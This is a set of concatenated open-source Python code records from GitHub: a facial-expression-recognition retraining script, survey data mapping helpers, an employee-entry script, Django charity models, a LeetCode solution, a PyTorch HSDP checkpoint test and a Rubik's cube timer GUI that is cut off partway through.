default='/home/gpu/FER/datasets/RAFdataset/test',\n help=\"root path to test data directory\")\n parser.add_argument('--RAF-label-train-txt', default='/home/gpu/FER/datasets/RAFdataset/RAF_train_label2.txt', type=str, help='')\n parser.add_argument('--RAF-label-test-txt', default='/home/gpu/FER/datasets/RAFdataset/RAF_test_label2.txt', type=str, help='')\n # AffectNet setting\n parser.add_argument('--Aff-root', type=str, default='/home/gpu/FER/datasets/Manually_Annotated_Images_Crop1308',\n help=\"root path to train data directory\")\n parser.add_argument('--Aff-label-train-txt', default='/home/gpu/FER/datasets/training_label2.csv', type=str, help='')\n parser.add_argument('--Aff-label-test-txt', default='/home/gpu/FER/datasets/validation_label2.csv', type=str, help='')\n # SFEW setting\n parser.add_argument('--SFEW-train-root', type=str, default='/home/gpu/FER/datasets',\n help=\"root path to train data directory\")\n parser.add_argument('--SFEW-test-root', type=str, default='/home/gpu/FER/datasets/SFEW/Val_crop',\n help=\"root path to test data directory\")\n parser.add_argument('--SFEW-label-train-txt', default='/home/gpu/FER/datasets/SFEW/train.txt', type=str, help='')\n parser.add_argument('--SFEW-label-test-txt', default='/home/gpu/FER/datasets/SFEW/val.txt', type=str, help='')\n # FERPlus setting\n parser.add_argument('--file-name', type=str, default='/home/gpu/FER/datasets/FER++/FERPlus1.h5', help=\"root path to train data directory\")\n # FED-RO setting\n parser.add_argument('--FED_test_root', default='/home/gpu/FER/datasets/FED-RO_crop1', type=str, help='')\n parser.add_argument('--FED-label-test-txt', default='/home/gpu/FER/datasets/FED-RO_crop/FED-RO.txt', type=str, help='')\n # CK+ setting\n parser.add_argument('--CK-test-root', type=str, default='/home/gpu/FER/datasets/CK+_crop',\n help=\"root path to test data directory\")\n parser.add_argument('--CK-label-test-txt', default='/home/gpu/FER/datasets/CK+_crop/CK+_8.txt', type=str,\n help='')\n\n # other setting\n parser.add_argument('--cosine', action='store_true',\n help='using cosine annealing')\n parser.add_argument('--warm', action='store_true',\n help='warm-up for large batch training')\n\n parser.add_argument('--ckpt', type=str, default='save/Mix_models/CRS-CONT_Mix_resnet18_bsz_128/last.pth',\n help='path to pre-trained model')\n\n opt = parser.parse_args()\n\n # set the path according to the environment\n opt.data_folder = './datasets/'\n\n iterations = opt.lr_decay_epochs.split(',')\n opt.lr_decay_epochs = list([])\n for it in iterations:\n opt.lr_decay_epochs.append(int(it))\n\n opt.model_name = '{}_{}_lr_{}_decay_{}_bsz_{}'.\\\n format(opt.dataset, opt.model, opt.learning_rate, opt.weight_decay,\n opt.batch_size)\n\n if opt.cosine:\n opt.model_name = '{}_cosine'.format(opt.model_name)\n\n # warm-up for large-batch training,\n if opt.warm:\n opt.model_name = '{}_warm'.format(opt.model_name)\n opt.warmup_from = 0.01\n opt.warm_epochs = 10\n if opt.cosine:\n eta_min = opt.learning_rate * (opt.lr_decay_rate ** 3)\n opt.warmup_to = eta_min + (opt.learning_rate - eta_min) * (\n 1 + math.cos(math.pi * opt.warm_epochs / opt.epochs)) / 2\n else:\n opt.warmup_to = opt.learning_rate\n\n if opt.dataset == 'RAF-DB':\n opt.n_cls = 7\n elif opt.dataset == 'AffectNet':\n opt.n_cls = 7\n elif opt.dataset == 'SFEW':\n opt.n_cls = 7\n elif opt.dataset == 'CK':\n opt.n_cls = 8\n elif opt.dataset == 'FERPlus':\n opt.n_cls = 8\n elif opt.dataset == 'FED-RO':\n opt.n_cls = 7\n else:\n raise ValueError('dataset not supported: {}'.format(opt.dataset))\n\n return opt\n\ndef set_loader(opt):\n # construct data loader\n if opt.dataset == 'RAF-DB' or 'AffectNet' or 'SFEW' or 'CAER-S' or 'CK' or 'FERPlus':\n mean = (0.485, 0.456, 0.406)\n std = (0.229, 0.224, 0.225)\n else:\n raise ValueError('dataset not supported: {}'.format(opt.dataset))\n normalize = transforms.Normalize(mean=mean, std=std)\n\n train_transform = transforms.Compose([\n transforms.RandomResizedCrop(size=224, scale=(0.6, 1.)),#0.2 1\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize,\n ])\n\n val_transform = transforms.Compose([\n transforms.Resize(224),\n transforms.ToTensor(),\n normalize,\n ])\n\n if opt.dataset == 'RAF-DB':\n train_dataset = Dataset_RAF(root=opt.RAF_train_root, file_list=opt.RAF_label_train_txt, transform=train_transform)\n val_dataset = Dataset_RAF(root=opt.RAF_test_root, file_list=opt.RAF_label_test_txt, transform=val_transform)\n elif opt.dataset == 'AffectNet':\n train_dataset = Dataset_AffectNet(root=opt.Aff_root, file_list=opt.Aff_label_train_txt, transform=train_transform)\n val_dataset = Dataset_AffectNet(root=opt.Aff_root, file_list=opt.Aff_label_test_txt, transform=val_transform)\n elif opt.dataset == 'SFEW':\n train_dataset = Dataset_RAF(root=opt.SFEW_train_root, file_list=opt.SFEW_label_train_txt, transform=train_transform)\n val_dataset = Dataset_RAF(root=opt.SFEW_test_root, file_list=opt.SFEW_label_test_txt, transform=val_transform)\n # train_dataset_RAF = Dataset_RAF(root=opt.RAF_train_root, file_list=opt.RAF_label_train_txt, transform=train_transform)\n # train_dataset_Aff = Dataset_AffectNet(root=opt.Aff_root, file_list=opt.Aff_label_train_txt, transform=train_transform)\n # train_dataset = data.ConcatDataset([train_dataset_RAF, train_dataset_Aff])\n # val_dataset1 = Dataset_RAF(root=opt.SFEW_train_root, file_list=opt.SFEW_label_train_txt, transform=train_transform)\n # val_dataset2 = Dataset_RAF(root=opt.SFEW_test_root, file_list=opt.SFEW_label_test_txt, transform=val_transform)\n # val_dataset = data.ConcatDataset([val_dataset1, val_dataset2])\n elif opt.dataset == 'FED-RO':\n train_dataset_RAF = Dataset_RAF(root=opt.RAF_train_root, file_list=opt.RAF_label_train_txt, transform=train_transform)\n train_dataset_Aff = Dataset_AffectNet(root=opt.Aff_root, file_list=opt.Aff_label_train_txt, transform=train_transform)\n train_dataset = data.ConcatDataset([train_dataset_RAF, train_dataset_Aff])\n val_dataset = Dataset_RAF(root=opt.FED_test_root, file_list=opt.FED_label_test_txt, transform=val_transform)\n elif opt.dataset == 'CK':\n # train_dataset_RAF = Dataset_RAF(root=opt.RAF_train_root, file_list=opt.RAF_label_train_txt, transform=train_transform)\n # train_dataset_Aff = Dataset_AffectNet(root=opt.Aff_root, file_list=opt.Aff_label_train_txt, transform=train_transform)\n # train_dataset = data.ConcatDataset([train_dataset_RAF, train_dataset_Aff])\n #train_dataset = Dataset_RAF(root=opt.RAF_train_root, file_list=opt.RAF_label_train_txt, transform=train_transform)\n train_dataset = Dataset_AffectNet(root=opt.Aff_root, file_list=opt.Aff_label_train_txt, transform=train_transform)\n val_dataset = Dataset_RAF(root=opt.CK_test_root, file_list=opt.CK_label_test_txt, transform=val_transform)\n elif opt.dataset == 'FERPlus':\n train_dataset = FERPlus(file_name=opt.file_name, split='Training', transform=train_transform)\n val_dataset = FERPlus(file_name=opt.file_name, split='PrivateTest', transform=val_transform)\n else:\n raise ValueError(opt.dataset)\n\n if opt.dataset == 'RAF-DB':\n train_sampler = None\n elif opt.dataset == 'AffectNet':\n train_sampler = ImbalancedDatasetSampler(train_dataset)\n elif opt.dataset == 'SFEW':\n train_sampler = None\n elif opt.dataset == 'FED-RO':\n train_sampler = None\n elif opt.dataset == 'CK':\n train_sampler = None\n elif opt.dataset == 'FERPlus':\n train_sampler = None\n else:\n raise ValueError(opt.dataset)\n\n train_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=opt.batch_size, shuffle=(train_sampler is None),\n num_workers=opt.num_workers, pin_memory=True, sampler=train_sampler)\n val_loader = torch.utils.data.DataLoader(\n val_dataset, batch_size=256, shuffle=False,\n num_workers=8, pin_memory=True)\n\n return train_loader, val_loader\n\ndef set_model(opt):\n model = SupConResNet(name=opt.model)\n criterion = torch.nn.CrossEntropyLoss()\n\n classifier = LinearClassifier(name=opt.model, num_classes=opt.n_cls)\n\n ckpt = torch.load(opt.ckpt, map_location='cpu')\n state_dict = ckpt['model']\n\n if torch.cuda.is_available():\n if torch.cuda.device_count() > 1:\n model.encoder = torch.nn.DataParallel(model.encoder)\n else:\n new_state_dict = {}\n for k, v in state_dict.items():\n k = k.replace(\"module.\", \"\")\n new_state_dict[k] = v\n state_dict = new_state_dict\n model = model.cuda()\n classifier = classifier.cuda()\n criterion = criterion.cuda()\n cudnn.benchmark = True\n\n model.load_state_dict(state_dict)\n\n return model, classifier, criterion\n\n\ndef train(train_loader, model, classifier, criterion, optimizer, epoch, opt):\n \"\"\"one epoch training\"\"\"\n model.eval()\n classifier.train()\n\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n\n end = time.time()\n for idx, (images, labels, _) in enumerate(train_loader):\n data_time.update(time.time() - end)\n\n images = images.cuda(non_blocking=True)\n labels = labels.cuda(non_blocking=True)\n bsz = labels.shape[0]\n\n # warm-up learning rate\n warmup_learning_rate(opt, epoch, idx, len(train_loader), optimizer)\n\n # compute loss\n with torch.no_grad():\n features = model.encoder(images)\n\n output = classifier(features.detach())\n loss = criterion(output, labels)\n\n # update metric\n losses.update(loss.item(), bsz)\n acc1, acc5 = accuracy(output, labels, topk=(1, 5))\n top1.update(acc1[0], bsz)\n\n # SGD\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n # print info\n if (idx + 1) % opt.print_freq == 0:\n print('Train: [{0}][{1}/{2}]\\t'\n 'BT {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'DT {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'loss {loss.val:.3f} ({loss.avg:.3f})\\t'\n 'Acc@1 {top1.val:.3f} ({top1.avg:.3f})'.format(\n epoch, idx + 1, len(train_loader), batch_time=batch_time,\n data_time=data_time, loss=losses, top1=top1))\n sys.stdout.flush()\n\n return losses.avg, top1.avg\n\n\ndef validate(val_loader, model, classifier, criterion, opt):\n \"\"\"validation\"\"\"\n model.eval()\n classifier.eval()\n\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n\n with torch.no_grad():\n end = time.time()\n for idx, (images, labels, _) in enumerate(val_loader):\n images = images.float().cuda()\n labels = labels.cuda()\n bsz = labels.shape[0]\n\n # forward\n output = classifier(model.encoder(images))\n loss = criterion(output, labels)\n\n # update metric\n losses.update(loss.item(), bsz)\n acc1, acc5 = accuracy(output, labels, topk=(1, 5))\n top1.update(acc1[0], bsz)\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if idx % opt.print_freq == 0:\n print('Test: [{0}/{1}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Acc@1 {top1.val:.3f} ({top1.avg:.3f})'.format(\n idx, len(val_loader), batch_time=batch_time,\n loss=losses, top1=top1))\n\n print(' * Acc@1 {top1.avg:.3f}'.format(top1=top1))\n return losses.avg, top1.avg\n\n\ndef main():\n best_acc = 0\n opt = parse_option()\n\n # build data loader\n train_loader, val_loader = set_loader(opt)\n\n # build model and criterion\n model, classifier, criterion = set_model(opt)\n\n print(' Total params: %.2fM' % (sum(p.numel() for p in model.encoder.parameters())/1000000.0))\n\n # build optimizer\n optimizer = set_optimizer(opt, classifier)\n\n # training routine\n for epoch in range(1, opt.epochs + 1):\n adjust_learning_rate(opt, optimizer, epoch)\n\n # train for one epoch\n time1 = time.time()\n loss, acc = train(train_loader, model, classifier, criterion,\n optimizer, epoch, opt)\n time2 = time.time()\n print('Train epoch {}, total time {:.2f}, accuracy:{:.2f}'.format(\n epoch, time2 - time1, acc))\n\n # eval for one epoch\n loss, val_acc = validate(val_loader, model, classifier, criterion, opt)\n if val_acc > best_acc:\n best_acc = val_acc\n save_model(classifier, optimizer, opt, epoch, os.path.join('best_classifier.pth'))\n\n print('best accuracy: {:.2f}'.format(best_acc))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hangyu94/CRS-CONT","sub_path":"retrain.py","file_name":"retrain.py","file_ext":"py","file_size_in_byte":16075,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"74389804071","text":"import pandas as pd\nimport numpy as np\n\n\nclass MakePregMap:\n \"\"\"\n mapping records according to given index column\n \"\"\"\n\n def __init__(self, data, id_column):\n \"\"\"\n initialize\n :param data: dataframe\n :param id_column: index column for records\n \"\"\"\n self.data = data\n self.case_ids = id_column\n\n @property\n def unique_responds(self):\n \"\"\"\n get unique indexes\n :return: array\n \"\"\"\n return self.data[self.case_ids].unique()\n\n def pregnancy_map(self):\n \"\"\"\n map records according to unique indexes\n :return: dict\n \"\"\"\n maped_pregs = {}\n for case_id in self.unique_responds:\n maped_pregs[case_id] = self.data[self.data[self.case_ids] == case_id]\n\n return maped_pregs\n\n\ndef get_preg_lengths(data, id_column):\n \"\"\"\n pregnancy length\n :param data: dataFrame\n :param id_column: index column\n :return: dataFrame\n \"\"\"\n preg_len = {}\n maped_pregs = MakePregMap(data, id_column)\n\n for key, value in maped_pregs.pregnancy_map().items():\n preg_len[key] = [value[value['birthord'] == 1]['gest_lb'].values[0],\n np.ceil(np.median(value[value['birthord'] > 1]['gest_lb']))]\n\n return pd.DataFrame(preg_len.values(),\n index=preg_len.keys(),\n columns=['firstBabies', 'others'])\n\n\ndef get_res_ages(data, id_column):\n \"\"\"\n age data by index\n :param data: dataframe\n :param id_column: index column\n :return: dataFrame\n \"\"\"\n resp_ages = {}\n maped_pregs = MakePregMap(data, id_column)\n\n for key, value in maped_pregs.pregnancy_map().items():\n temp = value.sort_values(by='birthord')\n resp_ages[key] = [temp.head(1)['ager'].values[0],\n temp.head(1)['pregordr'].values[0],\n temp.head(1)['birthord'].values[0],\n temp.head(1)['agecon'].values[0],\n temp.head(1)['agepreg'].values[0],\n temp.tail(1)['pregordr'].values[0],\n temp.tail(1)['birthord'].values[0],\n temp.tail(1)['agecon'].values[0],\n temp.tail(1)['agepreg'].values[0],\n ]\n\n return pd.DataFrame(resp_ages.values(),\n index=resp_ages.keys(),\n columns=['age_int',\n 'pregord_fst', 'birthord_fst',\n 'agecon_fst', 'agepreg_fst',\n 'pregord_lst', 'birthord_lst',\n 'agecon_lst', 'agepreg_lst'])\n\n\ndef get_outcome_rec(data, id_column):\n \"\"\"\n get each respondents pregnancy outcome details\n :param data: dataframe\n :param id_column: index column\n :return: dataFrame\n \"\"\"\n outcomes = {}\n maped_pregs = MakePregMap(data, id_column)\n\n for key, value in maped_pregs.pregnancy_map().items():\n outcomes[key] = [value.shape[0],\n len(value[value['outcome'] == 1]),\n len(value[value['outcome'] == 2]),\n len(value[value['outcome'] == 3]),\n len(value[value['outcome'] == 4]),\n len(value[value['outcome'] == 5]),\n len(value[value['outcome'] == 6])\n ]\n\n return pd.DataFrame(outcomes.values(),\n index=outcomes.keys(),\n columns=['pregnum',\n 'livebrth', 'induabor',\n 'stilbirth', 'miscarg',\n 'epcpreg', 'curpreg'])\n","repo_name":"ashen007/National-Survey-of-Family-Growth","sub_path":"Modules/mapping_rcd.py","file_name":"mapping_rcd.py","file_ext":"py","file_size_in_byte":3777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71589420714","text":"from Employees_Project import *\r\n\r\n\r\n\r\ndef add_emp_manually():\r\n number_of_users = exception_check(input, \"\\n Please enter the number of users: \")\r\n for user in range(number_of_users):\r\n the_id_after_checking = checking_if_id_already_exist_in_the_system(input, \" Enter the ID number- \")\r\n if the_id_after_checking[0] is True:\r\n print(error_style(\"ID already exists in the system\"))\r\n else:\r\n users = details_for_employees_class(the_id_after_checking[1], \" Enter your name- \", \" Enter your phone- \",\r\n \" Enter your age- \", input)\r\n save_data_in_files(open_main_employees_file(), r'C:\\Users\\barab\\Desktop\\employees.xlsx', users)\r\n back_to_menu()\r\n\r\n\r\ndef add_emp_from_file():\r\n user_file_path = read_file(\"\\n\"r' Please enter the path where the Excel file is stored\\File name.xlsx : ')\r\n for id_num in list(user_file_path[0]):\r\n the_id_after_checking = checking_if_id_already_exist_in_the_system(None, id_num)\r\n if the_id_after_checking[0] is True:\r\n print(error_style(\"The ID-\"), the_id_after_checking[1], error_style(\" not saved because it already exist in the system. \"))\r\n continue\r\n else:\r\n index_id_number = list(user_file_path[0]).index(the_id_after_checking[1])\r\n users = details_for_employees_class(the_id_after_checking[1], user_file_path[1][index_id_number],\r\n user_file_path[2][index_id_number], user_file_path[3][index_id_number], None)\r\n save_data_in_files(open_main_employees_file(), r'C:\\Users\\barab\\Desktop\\employees.xlsx', users)\r\n back_to_menu()\r\n","repo_name":"Barabramov/employees-project-python","sub_path":"AddEmployees.py","file_name":"AddEmployees.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15195228177","text":"# Django\nfrom django.db import models\n\n\n# Create your models here.\n\n\nclass Member(models.Model):\n \"\"\"\n Adding members to the charitable trust\n \"\"\"\n ration_card_status = (\n ('APL', 'APL'),\n ('BPL', 'BPL'),\n )\n\n name = models.CharField(max_length=30, verbose_name='Name')\n age = models.IntegerField(verbose_name='Age')\n phone = models.PositiveIntegerField(help_text='Enter phone number without country code')\n house_name = models.CharField(max_length=50)\n locality = models.CharField(max_length=50)\n pin_code = models.IntegerField()\n ration_card = models.CharField(choices=ration_card_status, max_length=10)\n annual_income = models.IntegerField()\n job = models.CharField(max_length=50)\n remark = models.TextField(max_length=100, help_text='Max 100 letters', blank=True)\n\n class Meta:\n unique_together = ('name', 'house_name', 'phone')\n\n def __str__(self):\n return self.name\n\n\nclass HouseMember(models.Model):\n \"\"\"\n Its for adding house members details of an member to added to charitable trust\n \"\"\"\n member = models.ForeignKey(Member, on_delete=models.CASCADE)\n name = models.CharField(max_length=50, blank=True)\n age = models.IntegerField(blank=True, null=True)\n job = models.CharField(max_length=50, blank=True)\n relationship = models.CharField(max_length=50, blank=True)\n\n def __str__(self):\n return self.name\n\n\nclass Category(models.Model):\n \"\"\"\n Defines that which type of category are providing. eg:- Food, Medicine etc\n \"\"\"\n category = models.CharField(max_length=30)\n\n def __str__(self):\n return self.category\n\n\nclass Need(models.Model):\n \"\"\"\n requirement for a member\n \"\"\"\n member = models.OneToOneField(Member, on_delete=models.CASCADE,)\n requirement = models.ManyToManyField(Category, blank=True,)\n","repo_name":"amjedsaleel/Kavin-Gramam","sub_path":"charity/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28993822677","text":"def sortedSquares(A):\n \"\"\"\n 问题描述:给定一个按非递减顺序排序的整数数组 A,返回每个数字的平方组成的新数组,\n 要求也按非递减顺序排序。\n 解决思路: 设立头尾两个指针, 比较其绝对值大小, 大的那个即在数组B的后面\n :param A:\n :return:\n \"\"\"\n n = len(A)\n B = [None for _ in A]\n index, left, right = n - 1, 0, n - 1\n while index >= 0:\n if abs(A[left]) < abs(A[right]):\n B[index] = A[right] ** 2\n right -= 1\n else:\n B[index] = A[left] ** 2\n left += 1\n index -= 1\n return B\n\n\nif __name__ == \"__main__\":\n test_arr = [-7, -6, -2, 0, 8, 9]\n print(sortedSquares(test_arr))\n","repo_name":"gzjandpy/python-algorithm","sub_path":"leetcode/tag/array/simple/Squares of a Sorted Array.py","file_name":"Squares of a Sorted Array.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14821016989","text":"# Owner(s): [\"oncall: distributed\"]\nfrom copy import deepcopy\n\nimport torch\nimport torch.distributed.checkpoint as dist_cp\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.distributed._tensor import init_device_mesh, Replicate\n\nfrom torch.distributed.checkpoint.default_planner import (\n DefaultLoadPlanner,\n DefaultSavePlanner,\n)\n\nfrom torch.distributed.fsdp import FullyShardedDataParallel as FSDP\nfrom torch.distributed.fsdp.fully_sharded_data_parallel import (\n ShardingStrategy,\n StateDictType,\n)\nfrom torch.testing._internal.common_distributed import skip_if_lt_x_gpu\nfrom torch.testing._internal.common_utils import (\n instantiate_parametrized_tests,\n parametrize,\n run_tests,\n)\n\nfrom torch.testing._internal.distributed._tensor.common_dtensor import (\n DTensorTestBase,\n with_comms,\n)\nfrom torch.testing._internal.distributed.checkpoint_utils import with_temp_dir\n\n\nclass SimpleModel(torch.nn.Module):\n def __init__(self):\n super().__init__()\n self.net1 = nn.Linear(5, 8)\n self.relu = nn.ReLU()\n self.net2 = nn.Linear(8, 4)\n self.net3 = nn.Linear(4, 12)\n\n def forward(self, x):\n x = F.relu(self.net1(x))\n x = F.relu(self.net2(x))\n x = F.relu(self.net3(x))\n return x\n\n def get_input(self):\n return torch.rand(4, 5, device=\"cuda\")\n\n\nclass SimpleModelUneven(torch.nn.Module):\n def __init__(self):\n super().__init__()\n self.net1 = nn.Linear(5, 10)\n self.relu = nn.ReLU()\n self.net2 = nn.Linear(10, 15)\n self.net3 = nn.Linear(15, 30)\n self.net4 = nn.Linear(30, 5)\n\n def forward(self, x):\n x = F.relu(self.net1(x))\n x = F.relu(self.net2(x))\n x = F.relu(self.net3(x))\n x = F.relu(self.net4(x))\n return x\n\n def get_input(self):\n return torch.rand(4, 5, device=\"cuda\")\n\n\nclass TestHSDPCheckpoint(DTensorTestBase):\n @property\n def backend(self):\n return \"cpu:gloo,cuda:nccl\"\n\n @with_comms\n @skip_if_lt_x_gpu(4)\n @with_temp_dir\n @parametrize(\"is_even_sharded_model\", [True, False])\n def test_hsdp_checkpoint(self, is_even_sharded_model) -> None:\n CHECKPOINT_DIR = self.temp_dir\n simple_model = SimpleModel if is_even_sharded_model else SimpleModelUneven\n\n mesh_2d = init_device_mesh(self.device_type, (2, self.world_size // 2))\n model = FSDP(\n simple_model().cuda(),\n sharding_strategy=ShardingStrategy.HYBRID_SHARD,\n device_mesh=mesh_2d,\n )\n optim = torch.optim.Adam(model.parameters(), lr=0.1)\n\n FSDP.set_state_dict_type(\n model,\n StateDictType.SHARDED_STATE_DICT,\n )\n state_dict = {\"model\": model.state_dict()}\n state_dict_to_save = deepcopy(state_dict)\n\n dist_cp.save_state_dict(\n state_dict=state_dict_to_save,\n storage_writer=dist_cp.FileSystemWriter(CHECKPOINT_DIR),\n planner=DefaultSavePlanner(),\n )\n\n # Update the parameters so current model state_dict now be different from state_dict_to_save.\n model(model.get_input()).sum().backward()\n optim.step()\n\n # At this point, the current state dict is different from state_dict_to_save.\n for (k1, v1), (k2, v2) in zip(\n state_dict_to_save[\"model\"].items(), model.state_dict().items()\n ):\n self.assertEqual(k1, k2)\n self.assertEqual(v1.device_mesh, v2.device_mesh)\n self.assertEqual(v1.placements, v2.placements)\n self.assertNotEqual(v1.to_local(), v2.to_local())\n\n dist_cp.load_state_dict(\n state_dict=state_dict_to_save,\n storage_reader=dist_cp.FileSystemReader(CHECKPOINT_DIR),\n planner=DefaultLoadPlanner(),\n )\n model.load_state_dict(state_dict_to_save[\"model\"])\n\n state_dict_after_load = model.state_dict()\n # After loading, the current model state dict should be the same as state_dict_to_save.\n for (k1, v1), (k2, v2) in zip(\n state_dict_to_save[\"model\"].items(), model.state_dict().items()\n ):\n self.assertEqual(k1, k2)\n self.assertEqual(v1.device_mesh, v2.device_mesh)\n self.assertEqual(v1.placements, v2.placements)\n self.assertEqual(v1.to_local(), v2.to_local())\n\n @with_comms\n @skip_if_lt_x_gpu(4)\n @with_temp_dir\n @parametrize(\"is_even_sharded_model\", [True, False])\n def test_hsdp_fsdp_checkpoint_conversion(self, is_even_sharded_model) -> None:\n CHECKPOINT_DIR = self.temp_dir\n simple_model = SimpleModel if is_even_sharded_model else SimpleModelUneven\n\n # save the hsdp model state_dict\n mesh_2d = init_device_mesh(self.device_type, (2, self.world_size // 2))\n hsdp_model = FSDP(\n simple_model().cuda(),\n sharding_strategy=ShardingStrategy.HYBRID_SHARD,\n device_mesh=mesh_2d,\n )\n FSDP.set_state_dict_type(\n hsdp_model,\n StateDictType.SHARDED_STATE_DICT,\n )\n hsdp_state_dict = {\"model\": hsdp_model.state_dict()}\n dist_cp.save_state_dict(\n state_dict=hsdp_state_dict,\n storage_writer=dist_cp.FileSystemWriter(CHECKPOINT_DIR),\n planner=DefaultSavePlanner(),\n )\n\n # initialize a fsdp model to load checkpoint into\n mesh_1d = init_device_mesh(self.device_type, (self.world_size,))\n fsdp_model = FSDP(\n simple_model().cuda(),\n device_mesh=mesh_1d,\n )\n FSDP.set_state_dict_type(\n fsdp_model,\n StateDictType.SHARDED_STATE_DICT,\n )\n fsdp_state_dict = {\"model\": fsdp_model.state_dict()}\n\n # at this point, the hsdp model parameters are different from fsdp model parameters.\n for (k1, v1), (k2, v2) in zip(\n hsdp_state_dict[\"model\"].items(), fsdp_state_dict[\"model\"].items()\n ):\n self.assertEqual(k1, k2)\n self.assertNotEqual(v1.device_mesh, v2.device_mesh)\n self.assertNotEqual(v1.placements, v2.placements)\n v1_all_gather = v1.redistribute(\n mesh_2d, placements=(Replicate(), Replicate())\n )\n v2_all_gather = v2.redistribute(mesh_1d, placements=(Replicate(),))\n self.assertNotEqual(v1_all_gather.to_local(), v2_all_gather.to_local())\n\n # load the fsdp state_dict from storage\n dist_cp.load_state_dict(\n state_dict=fsdp_state_dict,\n storage_reader=dist_cp.FileSystemReader(CHECKPOINT_DIR),\n planner=DefaultLoadPlanner(),\n )\n fsdp_model.load_state_dict(fsdp_state_dict[\"model\"])\n\n state_dict_after_load = fsdp_model.state_dict()\n # After loading, the current model state dict should be the same as hsdp_state_dict.\n for (k1, v1), (k2, v2) in zip(\n hsdp_state_dict[\"model\"].items(), state_dict_after_load.items()\n ):\n self.assertEqual(k1, k2)\n self.assertNotEqual(v1.device_mesh, v2.device_mesh)\n self.assertNotEqual(v1.placements, v2.placements)\n v1_all_gather = v1.redistribute(\n mesh_2d, placements=(Replicate(), Replicate())\n )\n v2_all_gather = v2.redistribute(mesh_1d, placements=(Replicate(),))\n self.assertEqual(v1_all_gather.to_local(), v2_all_gather.to_local())\n\n\ninstantiate_parametrized_tests(TestHSDPCheckpoint)\nif __name__ == \"__main__\":\n run_tests()\n","repo_name":"pytorch/pytorch","sub_path":"test/distributed/checkpoint/test_hsdp_checkpoint.py","file_name":"test_hsdp_checkpoint.py","file_ext":"py","file_size_in_byte":7559,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"11125667062","text":"import time\r\nimport serial\r\nimport tkinter\r\nimport threading\r\nimport tkinter.ttk as ttk\r\nimport functions as core\r\n\r\ndef refreshAll():\r\n loadTimes()\r\n scrambleTxt[\"text\"] = core.scramble()\r\n\r\ndef getAvg(n):\r\n sum = 0\r\n for i in range(0,n):\r\n try:\r\n sum+=float(cbb.get(i).replace(\"\\n\", \"\"))\r\n except Exception:\r\n return 0\r\n \r\n return round(sum/n,4)\r\n\r\ndef loadTimes():\r\n cbb.delete(0, tkinter.END)\r\n for item in core.readTimes():\r\n cbb.insert(0, item)\r\n avg_three[\"text\"] = \"Avg. 3: \"+str(getAvg(3))\r\n avg_five[\"text\"] = \"Avg. 5: \"+str(getAvg(5))\r\n avg_twelve[\"text\"] = \"Avg. 12: \"+str(getAvg(12))\r\n avg_thirty[\"text\"] = \"Avg. 30: \"+str(getAvg(30))\r\n scrambleTxt[\"text\"] = core.scramble()\r\n\r\ndef deleteItem():\r\n try:\r\n toDelete = cbb.get(cbb.curselection())\r\n with open(\"times.data\", \"r\") as f:\r\n lines = f.readlines()\r\n with open(\"times.data\", \"w\") as f:\r\n for line in lines:\r\n if line != toDelete:\r\n f.write(line)\r\n loadTimes()\r\n except:\r\n pass\r\n\r\ndef timer():\r\n s = serial.Serial(port.get())\r\n tmpFrame.destroy()\r\n\r\n timest = \"\"\r\n timeend = \"\"\r\n\r\n while 1:\r\n ser = s.readline().decode(\"utf-8\").replace(\"\\n\",\"\")\r\n\r\n if ser == \"tmr_start\\r\":\r\n timest = time.time()\r\n txt.insert(tkinter.END, \"Running!\")\r\n elif ser == \"tmr_stop\\r\":\r\n timeend = time.time()\r\n\r\n if timest != \"\" and timeend != \"\":\r\n timeCurr = str(round(timeend-timest,4))\r\n\r\n txt.delete(0, tkinter.END)\r\n txt.insert(0, timeCurr)\r\n\r\n core.saveTime(timeCurr)\r\n \r\n cbb.insert(0, timeCurr)\r\n # loadTimes()\r\n\r\n timeCurr = \"\"\r\n timest = \"\"\r\n timeend = \"\"\r\n\r\n s.close()\r\n\r\ndef go():\r\n t = threading.Thread(target=timer, daemon=True)\r\n t.start()\r\n\r\n\r\n#####################\r\n### Layout\r\n#####################\r\n\r\nroot = tkinter.Tk()\r\n# root.geometry(\"500x500\")\r\n\r\nroot.title(\"Cubetimer - GUI\")\r\n\r\ntmpFrame = tkinter.Frame()\r\ntmpFrame.pack(side=tkinter.TOP)\r\n\r\nframe = tkinter.Frame()\r\nframe.pack()\r\n\r\nbtnFrame = tkinter.Frame()\r\nbtnFrame.pack(side=tkinter.TOP)\r\n\r\nport = ttk.Combobox(tmpFrame)\r\nport.pack(side=tkinter.LEFT, fill=tkinter.BOTH)\r\nports = core.loadPorts()\r\nport[\"values\"] = ports\r\nport.current(0)\r\n\r\nstartBtn = tkinter.Button(tmpFrame, text=\"Choose\", command=go)\r\nstartBtn.pack(side=tkinter.LEFT, fill=tkinter.BOTH)\r\n\r\ntxt = tkinter.Entry(frame, bd=5, insertwidth=1, font=30)\r\ntxt.pack()\r\n\r\nscrambleTxt = 